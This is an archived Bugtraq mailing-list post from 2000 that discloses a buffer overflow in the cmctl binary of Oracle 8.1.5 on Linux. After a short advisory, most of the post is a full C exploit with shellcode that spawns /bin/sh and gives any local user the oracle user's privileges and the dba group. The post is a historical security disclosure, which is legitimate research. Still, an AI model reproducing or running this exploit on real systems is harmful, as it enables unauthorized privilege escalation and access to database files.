![[LWN Logo]](/images/lcorner.png) |
|
![[Timeline]](/images/Included.png) |
Date: Mon, 20 Nov 2000 12:57:42 +0100
From: Juan Manuel Pascual Escriba <pask@PLAZASITE.COM>
Subject: vulnerability in Connection Manager Control binary in Oracle
To: BUGTRAQ@SECURITYFOCUS.COM
Hello Elias
Colud you make public this advisory. Oracle people dont send an
answer in 6 days. Please cut this lines.
Thanks
WWW.PLAZASITE.COM
System & Security Division
Title: Vulnerability in cmctl in Oracle 8.1.5
Date: 13-11-2000
Platform: Only tested in Linux, but can be exported to others.
Impact: Any user gain euid=oracle & egid=dba.
Author: Juan Manuel Pascual (pask@plazasite.com)
Status: Vendor Contacted. Details Below
OVERVIEW:
cmctl is a Connection Manager Control binary
PROBLEM SUMMARY:
There is a buffer overflow in cmctl that can be use by local
users to obtain euid of oracle user and egid to dba. With the default
instalation oracle user owns all database files.
IMPACT:
Any user with local access, can gain euid= oracle an egid=dba
SOLUTION:
Maybe a chmod -s ;-)))).
STATUS:
Vendor was contacted 13/1.1 No answers were received in last
4 days.
----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@plazasite.com
/*
Exploit Code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested in RH
6.2
and 6.1. Is possible to export to others platforms.
If someone exports this to Sparc please tell me.
synopsis: buffer overflow in cmctl
Impact: any user gain euid=oracle and egid=dba.
Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and
others.
Thanks for your patience and time.
Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.
*/
#include <stdio.h>
#include <stdlib.h>
#define DEFAULT_OFFSET 1
#define DEFAULT_BUFFER_SIZE 350
#define NOP 0x90
#define BINARY "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl
echo $pakito"
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
main(int argc, char *argv[]) {
char *buff, *ptr,*name[3],environ[100],binary[120];
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) offset = atoi(argv[1]);
else
{
printf("Use ./cmctl_start Offset\n");
exit(1);
}
buff = malloc(bsize);
addr = get_sp() - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("pakito",buff,1);
system(BINARY);
}
--
" In God We trust, Others We monitor "
-------------------------------------------------------------
Juan Manuel Pascual Escribá Administrador de Sistemas
PlazaSite S.A. c/ Tomás Bretón 32-38
08950 Esplugues de Llobregat (Barcelona), SPAIN
Ph: +34 93 3717398 Fax: +34 93 3711968
mob: 667591142 Email: pask@plazasite.com
-------------------------------------------------------------